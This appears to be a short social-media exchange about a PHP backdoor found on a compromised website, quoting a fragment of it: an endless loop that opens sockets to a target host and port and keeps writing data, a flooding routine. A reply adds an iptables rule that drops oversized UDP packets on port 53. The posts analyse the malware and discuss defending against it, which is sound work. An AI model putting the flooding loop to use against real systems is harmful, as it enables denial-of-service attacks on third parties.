A PHP backdoor on a compromised site being used to start attacks:

while(true)
{
$fp=fsockopen($trh2,$trp,$aaa1,$aaa2,1);
fwrite($fp,$spdat);
}

noc.org/articles/php-backdoor-


@dcid interesting that port 53 is hardcoded. I vaguely remember using a rule like:

# iptables -A FORWARD -p udp --dport 53 -m length --length 512: -j DROP

(i.e., block UDP packets > 512 bytes on port 53)
